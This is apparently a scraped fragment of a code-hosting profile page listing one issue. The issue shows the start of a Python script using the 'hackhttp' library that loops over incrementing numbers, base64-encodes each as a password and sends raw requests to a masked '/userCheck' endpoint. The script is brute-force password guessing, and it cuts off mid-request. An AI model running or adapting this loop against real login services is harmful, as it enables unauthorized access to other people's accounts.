heascle

Results 1 issues of heascle

``` import hackhttp from base64 import b64encode init = 100000 while True: pwd = '' pwd = b64encode('%d'%init) hh = hackhttp.hackhttp() raw = ''' GET /****/userCheck HTTP/1.1 Host:******* User-Agent: *****...